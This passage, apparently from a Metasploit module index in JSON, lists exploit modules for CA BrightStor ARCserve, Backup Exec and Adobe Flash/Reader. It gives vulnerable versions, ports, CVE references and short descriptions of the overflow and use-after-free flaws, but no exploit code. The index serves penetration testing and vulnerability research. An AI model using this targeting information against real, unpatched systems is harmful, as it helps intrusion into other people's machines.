"Backup Exec 16 (16.0 / revision 9.2), Windows <= 7 x64",
"Backup Exec 16 (16.0 / revision 9.2), Windows <= 7 x86"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/backupexec/ssl_uaf.rb",
"is_install_path": true,
"ref_name": "windows/backupexec/ssl_uaf",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/brightstor/ca_arcserve_342": {
"name": "Computer Associates ARCserve REPORTREMOTEEXECUTECML Buffer Overflow",
"full_name": "exploit/windows/brightstor/ca_arcserve_342",
"rank": 200,
"disclosure_date": "2008-10-09",
"type": "exploit",
"author": [
"Nahuel Cayento Riva",
"MC <mc@metasploit.com>"
],
"description": "This module exploits a buffer overflow in Computer Associates BrightStor ARCserve r11.5 (build 3884).\n By sending a specially crafted RPC request to opcode 0x342, an attacker could overflow the buffer\n and execute arbitrary code. In order to successfully exploit this vulnerability, you will need\n set the hostname argument (HNAME).",
"references": [
"BID-31684",
"OSVDB-49468",
"CVE-2008-4397",
"URL-http://crackinglandia.blogspot.com/2009/10/el-colador-de-ca-computer-associates.html"
],
"platform": "Windows",
"arch": "",
"rport": 6504,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Computer Associates BrightStor ARCserve r11.5 (build 3884)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/brightstor/ca_arcserve_342.rb",
"is_install_path": true,
"ref_name": "windows/brightstor/ca_arcserve_342",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/brightstor/discovery_tcp": {
"name": "CA BrightStor Discovery Service TCP Overflow",
"full_name": "exploit/windows/brightstor/discovery_tcp",
"rank": 200,
"disclosure_date": "2005-02-14",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a vulnerability in the CA BrightStor\n Discovery Service. This vulnerability occurs when a specific\n type of request is sent to the TCP listener on port 41523.\n This vulnerability was discovered by cybertronic[at]gmx.net\n and affects all known versions of the BrightStor product.\n This module is based on the 'cabrightstor_disco' exploit by\n HD Moore.",
"references": [
"CVE-2005-2535",
"OSVDB-13814",
"BID-12536",
"URL-http://archives.neohapsis.com/archives/bugtraq/2005-02/0123.html",
"EDB-1131"
],
"platform": "Windows",
"arch": "",
"rport": 41523,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"cheyprod.dll 9/14/2000",
"cheyprod.dll 12/12/2003",
"cheyprod.dll 07/21/2004"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/brightstor/discovery_tcp.rb",
"is_install_path": true,
"ref_name": "windows/brightstor/discovery_tcp",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/brightstor/discovery_udp": {
"name": "CA BrightStor Discovery Service Stack Buffer Overflow",
"full_name": "exploit/windows/brightstor/discovery_udp",
"rank": 200,
"disclosure_date": "2004-12-20",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a vulnerability in the CA BrightStor\n Discovery Service. This vulnerability occurs when a large\n request is sent to UDP port 41524, triggering a stack buffer\n overflow.",
"references": [
"CVE-2005-0260",
"OSVDB-13613",
"BID-12491",
"URL-http://www.idefense.com/application/poi/display?id=194&type=vulnerabilities"
],
"platform": "Windows",
"arch": "",
"rport": 41524,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"cheyprod.dll 12/12/2003",
"cheyprod.dll 07/21/2004"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/brightstor/discovery_udp.rb",
"is_install_path": true,
"ref_name": "windows/brightstor/discovery_udp",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/brightstor/etrust_itm_alert": {
"name": "Computer Associates Alert Notification Buffer Overflow",
"full_name": "exploit/windows/brightstor/etrust_itm_alert",
"rank": 200,
"disclosure_date": "2008-04-04",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a buffer overflow in Computer Associates Threat Manager for the Enterprise r8.1\n By sending a specially crafted RPC request, an attacker could overflow the buffer and execute arbitrary code.\n In order to successfully exploit this vulnerability, you will need valid logon credentials to the target.",
"references": [
"CVE-2007-4620",
"OSVDB-44040",
"BID-28605"
],
"platform": "Windows",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Windows 2003 SP0 English",
"Windows 2000 SP4 English",
"CA BrightStor ARCServe Backup 11.5 / Windows 2000 SP4 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/brightstor/etrust_itm_alert.rb",
"is_install_path": true,
"ref_name": "windows/brightstor/etrust_itm_alert",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/brightstor/hsmserver": {
"name": "CA BrightStor HSM Buffer Overflow",
"full_name": "exploit/windows/brightstor/hsmserver",
"rank": 500,
"disclosure_date": "2007-09-27",
"type": "exploit",
"author": [
"toto"
],
"description": "This module exploits one of the multiple stack buffer overflows in Computer Associates BrightStor HSM.\n By sending a specially crafted request, an attacker could overflow the buffer and execute arbitrary code.",
"references": [
"CVE-2007-5082",
"OSVDB-41363",
"BID-25823"
],
"platform": "Windows",
"arch": "",
"rport": 2000,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"BrightStor HSM 11.5 Windows All"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/brightstor/hsmserver.rb",
"is_install_path": true,
"ref_name": "windows/brightstor/hsmserver",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/brightstor/lgserver": {
"name": "CA BrightStor ARCserve for Laptops and Desktops LGServer Buffer Overflow",
"full_name": "exploit/windows/brightstor/lgserver",
"rank": 200,
"disclosure_date": "2007-01-31",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup\n for Laptops & Desktops 11.1. By sending a specially crafted request, an attacker could\n overflow the buffer and execute arbitrary code.",
"references": [
"CVE-2007-0449",
"OSVDB-31593",
"BID-22342"
],
"platform": "Windows",
"arch": "",
"rport": 1900,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 Pro English All"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/brightstor/lgserver.rb",
"is_install_path": true,
"ref_name": "windows/brightstor/lgserver",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/brightstor/lgserver_multi": {
"name": "CA BrightStor ARCserve for Laptops and Desktops LGServer Multiple Commands Buffer Overflow",
"full_name": "exploit/windows/brightstor/lgserver_multi",
"rank": 200,
"disclosure_date": "2007-06-06",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup\n for Laptops & Desktops 11.1. By sending a specially crafted request to multiple commands,\n an attacker could overflow the buffer and execute arbitrary code.",
"references": [
"CVE-2007-3216",
"OSVDB-35329",
"BID-24348"
],
"platform": "Windows",
"arch": "",
"rport": 1900,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 SP4 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/brightstor/lgserver_multi.rb",
"is_install_path": true,
"ref_name": "windows/brightstor/lgserver_multi",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/brightstor/lgserver_rxrlogin": {
"name": "CA BrightStor ARCserve for Laptops and Desktops LGServer Buffer Overflow",
"full_name": "exploit/windows/brightstor/lgserver_rxrlogin",
"rank": 200,
"disclosure_date": "2007-06-06",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup\n for Laptops & Desktops 11.1. By sending a specially crafted request, an attacker could\n overflow the buffer and execute arbitrary code.",
"references": [
"CVE-2007-5003",
"OSVDB-41353",
"BID-24348"
],
"platform": "Windows",
"arch": "",
"rport": 1900,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2003 SP0 English",
"Windows 2000 SP4 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/brightstor/lgserver_rxrlogin.rb",
"is_install_path": true,
"ref_name": "windows/brightstor/lgserver_rxrlogin",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter": {
"name": "CA BrightStor ARCserve for Laptops and Desktops LGServer rxsSetDataGrowthScheduleAndFilter Buffer Overflow",
"full_name": "exploit/windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter",
"rank": 200,
"disclosure_date": "2007-06-06",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup\n for Laptops & Desktops 11.1. By sending a specially crafted request (rxsSetDataGrowthScheduleAndFilter),\n an attacker could overflow the buffer and execute arbitrary code.",
"references": [
"CVE-2007-3216",
"OSVDB-35329",
"BID-24348"
],
"platform": "Windows",
"arch": "",
"rport": 1900,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 SP4 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter.rb",
"is_install_path": true,
"ref_name": "windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/brightstor/lgserver_rxsuselicenseini": {
"name": "CA BrightStor ARCserve for Laptops and Desktops LGServer Buffer Overflow",
"full_name": "exploit/windows/brightstor/lgserver_rxsuselicenseini",
"rank": 200,
"disclosure_date": "2007-06-06",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup\n for Laptops & Desktops 11.1. By sending a specially crafted request (rxsUseLicenseIni), an\n attacker could overflow the buffer and execute arbitrary code.",
"references": [
"CVE-2007-3216",
"OSVDB-35329",
"BID-24348"
],
"platform": "Windows",
"arch": "",
"rport": 1900,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2003 SP0 English",
"Windows 2000 SP4 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/brightstor/lgserver_rxsuselicenseini.rb",
"is_install_path": true,
"ref_name": "windows/brightstor/lgserver_rxsuselicenseini",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/brightstor/license_gcr": {
"name": "CA BrightStor ARCserve License Service GCR NETWORK Buffer Overflow",
"full_name": "exploit/windows/brightstor/license_gcr",
"rank": 200,
"disclosure_date": "2005-03-02",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup 11.0.\n By sending a specially crafted request to the lic98rmtd.exe service, an attacker\n could overflow the buffer and execute arbitrary code.",
"references": [
"CVE-2005-0581",
"OSVDB-14389",
"BID-12705"
],
"platform": "Windows",
"arch": "",
"rport": 10202,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2003 SP0 English",
"Windows 2000 SP4 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/brightstor/license_gcr.rb",
"is_install_path": true,
"ref_name": "windows/brightstor/license_gcr",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/brightstor/mediasrv_sunrpc": {
"name": "CA BrightStor ArcServe Media Service Stack Buffer Overflow",
"full_name": "exploit/windows/brightstor/mediasrv_sunrpc",
"rank": 200,
"disclosure_date": "2007-04-25",
"type": "exploit",
"author": [
"toto"
],
"description": "This exploit targets a stack buffer overflow in the MediaSrv RPC service of CA\n BrightStor ARCserve. By sending a specially crafted SUNRPC request, an attacker\n can overflow a stack buffer and execute arbitrary code.",
"references": [
"CVE-2007-2139",
"OSVDB-35326",
"BID-23635",
"ZDI-07-022"
],
"platform": "Windows",
"arch": "",
"rport": 111,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"BrightStor Arcserve 9.0 (?) - 11.5 SP2 (Windows 2000)",
"BrightStor Arcserve 9.0 (?) - 11.5 SP2 (Windows 2003)",
"BrightStor Arcserve 11.1 - 11.5 SP2 (Windows All - NX Support)"
],
"mod_time": "2017-09-08 22:19:55 +0000",
"path": "/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb",
"is_install_path": true,
"ref_name": "windows/brightstor/mediasrv_sunrpc",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/brightstor/message_engine": {
"name": "CA BrightStor ARCserve Message Engine Buffer Overflow",
"full_name": "exploit/windows/brightstor/message_engine",
"rank": 200,
"disclosure_date": "2007-01-11",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>",
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a buffer overflow in Computer Associates BrightStor ARCserve Backup\n 11.1 - 11.5 SP2. By sending a specially crafted RPC request, an attacker could overflow\n the buffer and execute arbitrary code.",
"references": [
"CVE-2007-0169",
"OSVDB-31318",
"BID-22005"
],
"platform": "Windows",
"arch": "",
"rport": 6503,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"BrightStor ARCserve r11.1",
"BrightStor ARCserve r11.5",
"BrightStor ARCserve r11.5 SP2"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/brightstor/message_engine.rb",
"is_install_path": true,
"ref_name": "windows/brightstor/message_engine",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/brightstor/message_engine_72": {
"name": "CA BrightStor ARCserve Message Engine 0x72 Buffer Overflow",
"full_name": "exploit/windows/brightstor/message_engine_72",
"rank": 200,
"disclosure_date": "2010-10-04",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a buffer overflow in Computer Associates BrightStor ARCserve Backup\n 11.1 - 11.5 SP2. By sending a specially crafted RPC request, an attacker could overflow\n the buffer and execute arbitrary code.",
"references": [
"OSVDB-68329",
"URL-http://www.metasploit.com/users/mc"
],
"platform": "Windows",
"arch": "",
"rport": 6504,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"BrightStor ARCserve r11.5/Windows 2003"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/brightstor/message_engine_72.rb",
"is_install_path": true,
"ref_name": "windows/brightstor/message_engine_72",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/brightstor/message_engine_heap": {
"name": "CA BrightStor ARCserve Message Engine Heap Overflow",
"full_name": "exploit/windows/brightstor/message_engine_heap",
"rank": 200,
"disclosure_date": "2006-10-05",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a heap overflow in Computer Associates BrightStor ARCserve Backup\n 11.5. By sending a specially crafted RPC request, an attacker could overflow the\n buffer and execute arbitrary code.",
"references": [
"CVE-2006-5143",
"OSVDB-29533",
"BID-20365"
],
"platform": "Windows",
"arch": "",
"rport": 6503,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 SP4 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/brightstor/message_engine_heap.rb",
"is_install_path": true,
"ref_name": "windows/brightstor/message_engine_heap",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/brightstor/sql_agent": {
"name": "CA BrightStor Agent for Microsoft SQL Overflow",
"full_name": "exploit/windows/brightstor/sql_agent",
"rank": 200,
"disclosure_date": "2005-08-02",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a vulnerability in the CA BrightStor\n Agent for Microsoft SQL Server. This vulnerability was\n discovered by cybertronic[at]gmx.net.",
"references": [
"CVE-2005-1272",
"OSVDB-18501",
"BID-14453",
"URL-http://www.idefense.com/application/poi/display?id=287&type=vulnerabilities",
"URL-http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33239"
],
"platform": "Windows",
"arch": "",
"rport": 6070,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"ARCServe 11.0 Asbrdcst.dll 12/12/2003",
"ARCServe 11.1 Asbrdcst.dll 07/21/2004",
"ARCServe 11.1 SP1 Asbrdcst.dll 01/14/2005",
"Windows 2000 SP0-SP3 English",
"Windows 2000 SP4 English",
"Windows XP SP0-SP1 English",
"Windows XP SP2 English",
"Windows 2003 SP0 English",
"Windows 2003 SP1 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/brightstor/sql_agent.rb",
"is_install_path": true,
"ref_name": "windows/brightstor/sql_agent",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/brightstor/tape_engine": {
"name": "CA BrightStor ARCserve Tape Engine Buffer Overflow",
"full_name": "exploit/windows/brightstor/tape_engine",
"rank": 200,
"disclosure_date": "2006-11-21",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>",
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup\n r11.1 - r11.5. By sending a specially crafted DCERPC request, an attacker could overflow\n the buffer and execute arbitrary code.",
"references": [
"CVE-2006-6076",
"OSVDB-30637",
"BID-21221",
"EDB-3086"
],
"platform": "Windows",
"arch": "",
"rport": 6502,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"BrightStor ARCserve r11.1",
"BrightStor ARCserve r11.5"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/brightstor/tape_engine.rb",
"is_install_path": true,
"ref_name": "windows/brightstor/tape_engine",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/brightstor/tape_engine_0x8a": {
"name": "CA BrightStor ARCserve Tape Engine 0x8A Buffer Overflow",
"full_name": "exploit/windows/brightstor/tape_engine_0x8a",
"rank": 200,
"disclosure_date": "2010-10-04",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup\n r11.1 - r11.5. By sending a specially crafted DCERPC request, an attacker could overflow\n the buffer and execute arbitrary code.",
"references": [
"OSVDB-68330",
"URL-http://www.metasploit.com/users/mc"
],
"platform": "Windows",
"arch": "",
"rport": 6502,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"BrightStor ARCserve r11.5/Windows 2003"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/brightstor/tape_engine_0x8a.rb",
"is_install_path": true,
"ref_name": "windows/brightstor/tape_engine_0x8a",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/brightstor/universal_agent": {
"name": "CA BrightStor Universal Agent Overflow",
"full_name": "exploit/windows/brightstor/universal_agent",
"rank": 200,
"disclosure_date": "2005-04-11",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a convoluted heap overflow in the CA\n BrightStor Universal Agent service. Triple userland\n exception results in heap growth and execution of\n dereferenced function pointer at a specified address.",
"references": [
"CVE-2005-1018",
"OSVDB-15471",
"BID-13102",
"URL-http://www.idefense.com/application/poi/display?id=232&type=vulnerabilities"
],
"platform": "Windows",
"arch": "",
"rport": 6050,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Magic Heap Target #1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/brightstor/universal_agent.rb",
"is_install_path": true,
"ref_name": "windows/brightstor/universal_agent",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/adobe_cooltype_sing": {
"name": "Adobe CoolType SING Table \"uniqueName\" Stack Buffer Overflow",
"full_name": "exploit/windows/browser/adobe_cooltype_sing",
"rank": 500,
"disclosure_date": "2010-09-07",
"type": "exploit",
"author": [
"Unknown",
"sn0wfl0w",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a vulnerability in the Smart INdependent Glyplets (SING) table\n handling within versions 8.2.4 and 9.3.4 of Adobe Reader. Prior versions are\n assumed to be vulnerable as well.",
"references": [
"CVE-2010-2883",
"OSVDB-67849",
"URL-http://contagiodump.blogspot.com/2010/09/cve-david-leadbetters-one-point-lesson.html",
"URL-http://www.adobe.com/support/security/advisories/apsa10-02.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/adobe_cooltype_sing.rb",
"is_install_path": true,
"ref_name": "windows/browser/adobe_cooltype_sing",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/adobe_flash_avm2": {
"name": "Adobe Flash Player Integer Underflow Remote Code Execution",
"full_name": "exploit/windows/browser/adobe_flash_avm2",
"rank": 300,
"disclosure_date": "2014-02-05",
"type": "exploit",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability found in the ActiveX component of Adobe Flash Player\n before 12.0.0.43. By supplying a specially crafted swf file it is possible to trigger an\n integer underflow in several avm2 instructions, which can be turned into remote code\n execution under the context of the user, as exploited in the wild in February 2014. This\n module has been tested successfully with Adobe Flash Player 11.7.700.202 on Windows XP\n SP3, Windows 7 SP1 and Adobe Flash Player 11.3.372.94 on Windows 8 even when it includes\n rop chains for several Flash 11 versions, as exploited in the wild.",
"references": [
"CVE-2014-0497",
"OSVDB-102849",
"BID-65327",
"URL-http://helpx.adobe.com/security/products/flash-player/apsb14-04.html",
"URL-http://blogs.technet.com/b/mmpc/archive/2014/02/17/a-journey-to-cve-2014-0497-exploit.aspx"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/adobe_flash_avm2.rb",
"is_install_path": true,
"ref_name": "windows/browser/adobe_flash_avm2",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/adobe_flash_casi32_int_overflow": {
"name": "Adobe Flash Player casi32 Integer Overflow",
"full_name": "exploit/windows/browser/adobe_flash_casi32_int_overflow",
"rank": 500,
"disclosure_date": "2014-10-14",
"type": "exploit",
"author": [
"bilou",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits an integer overflow in Adobe Flash Player. The vulnerability occurs in\n the casi32 method, where an integer overflow occurs if a ByteArray of length 0 is setup as\n domainMemory for the current application domain. This module has been tested successfully\n on Windows 7 SP1 (32-bit), IE 8 to IE 11 and Flash 15.0.0.167.",
"references": [
"ZDI-14-365",
"CVE-2014-0569",
"OSVDB-113199",
"URL-https://helpx.adobe.com/security/products/flash-player/apsb14-22.html",
"URL-http://malware.dontneedcoffee.com/2014/10/cve-2014-0569.html"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/adobe_flash_casi32_int_overflow.rb",
"is_install_path": true,
"ref_name": "windows/browser/adobe_flash_casi32_int_overflow",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/adobe_flash_copy_pixels_to_byte_array": {
"name": "Adobe Flash Player copyPixelsToByteArray Method Integer Overflow",
"full_name": "exploit/windows/browser/adobe_flash_copy_pixels_to_byte_array",
"rank": 500,
"disclosure_date": "2014-09-23",
"type": "exploit",
"author": [
"Chris Evans",
"Nicolas Joly",
"hdarwin",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits an integer overflow in Adobe Flash Player. The vulnerability occurs\n in the copyPixelsToByteArray method from the BitmapData object. The position field of the\n destination ByteArray can be used to cause an integer overflow and write contents out of\n the ByteArray buffer. This module has been tested successfully on:\n * Windows 7 SP1 (32-bit), IE 8 to IE 11 and Flash 14.0.0.176, 14.0.0.145, and 14.0.0.125.\n * Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 14.0.0.179.\n * Windows 8.1, Firefox 38.0.5 and Adobe Flash 14.0.0.179.",
"references": [
"CVE-2014-0556",
"OSVDB-111110",
"URL-http://googleprojectzero.blogspot.com/2014/09/exploiting-cve-2014-0556-in-flash.html",
"URL-https://code.google.com/p/google-security-research/issues/detail?id=46",
"URL-http://hacklab.kr/cve-2014-0556-%EB%B6%84%EC%84%9D/",
"URL-http://malware.dontneedcoffee.com/2014/10/cve-2014-0556-adobe-flash-player.html",
"URL-https://helpx.adobe.com/security/products/flash-player/apsb14-21.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb",
"is_install_path": true,
"ref_name": "windows/browser/adobe_flash_copy_pixels_to_byte_array",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/adobe_flash_domain_memory_uaf": {
"name": "Adobe Flash Player domainMemory ByteArray Use After Free",
"full_name": "exploit/windows/browser/adobe_flash_domain_memory_uaf",
"rank": 500,
"disclosure_date": "2014-04-14",
"type": "exploit",
"author": [
"bilou",
"Unknown",
"hdarwin",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a use-after-free vulnerability in Adobe Flash Player. The\n vulnerability occurs when the ByteArray assigned to the current ApplicationDomain\n is freed from an ActionScript worker, when forcing a reallocation by copying more\n contents than the original capacity, but Flash forgets to update the domainMemory\n pointer, leading to a use-after-free situation when the main worker references the\n domainMemory again. This module has been tested successfully on Windows 7 SP1\n (32-bit), IE 8 and IE11 with Flash 17.0.0.134.",
"references": [
"CVE-2015-0359",
"URL-https://helpx.adobe.com/security/products/flash-player/apsb15-06.html",
"URL-https://www.fireeye.com/blog/threat-research/2015/04/angler_ek_exploiting.html",
"URL-http://malware.dontneedcoffee.com/2015/04/cve-2015-0359-flash-up-to-1700134-and.html",
"URL-https://git.hacklab.kr/snippets/13",
"URL-http://pastebin.com/Wj3NViUu"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/adobe_flash_domain_memory_uaf.rb",
"is_install_path": true,
"ref_name": "windows/browser/adobe_flash_domain_memory_uaf",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/adobe_flash_filters_type_confusion": {
"name": "Adobe Flash Player Type Confusion Remote Code Execution",
"full_name": "exploit/windows/browser/adobe_flash_filters_type_confusion",
"rank": 300,
"disclosure_date": "2013-12-10",
"type": "exploit",
"author": [
"Unknown",
"bannedit <bannedit@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a type confusion vulnerability found in the ActiveX\n component of Adobe Flash Player. This vulnerability was found exploited\n in the wild in November 2013. This module has been tested successfully\n on IE 6 to IE 10 with Flash 11.7, 11.8 and 11.9 prior to 11.9.900.170\n over Windows XP SP3 and Windows 7 SP1.",
"references": [
"CVE-2013-5331",
"OSVDB-100774",
"BID-64199",
"URL-http://helpx.adobe.com/security/products/flash-player/apsb13-28.html",
"URL-http://blog.malwaretracker.com/2014/01/cve-2013-5331-evaded-av-by-using.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb",
"is_install_path": true,
"ref_name": "windows/browser/adobe_flash_filters_type_confusion",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/adobe_flash_mp4_cprt": {
"name": "Adobe Flash Player MP4 'cprt' Overflow",
"full_name": "exploit/windows/browser/adobe_flash_mp4_cprt",
"rank": 300,
"disclosure_date": "2012-02-15",
"type": "exploit",
"author": [
"Alexander Gavrun",
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Adobe Flash\n Player. By supplying a corrupt .mp4 file loaded by Flash, it\n is possible to gain arbitrary remote code execution under the\n context of the user.\n\n This vulnerability has been exploited in the wild as part of\n the \"Iran's Oil and Nuclear Situation.doc\" e-mail attack.\n According to the advisory, 10.3.183.15 and 11.x before\n 11.1.102.62 are affected.",
"references": [
"CVE-2012-0754",
"OSVDB-79300",
"BID-52034",
"URL-http://contagiodump.blogspot.com/2012/03/mar-2-cve-2012-0754-irans-oil-and.html",
"URL-http://www.adobe.com/support/security/bulletins/apsb12-03.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 6 on Windows XP SP3",
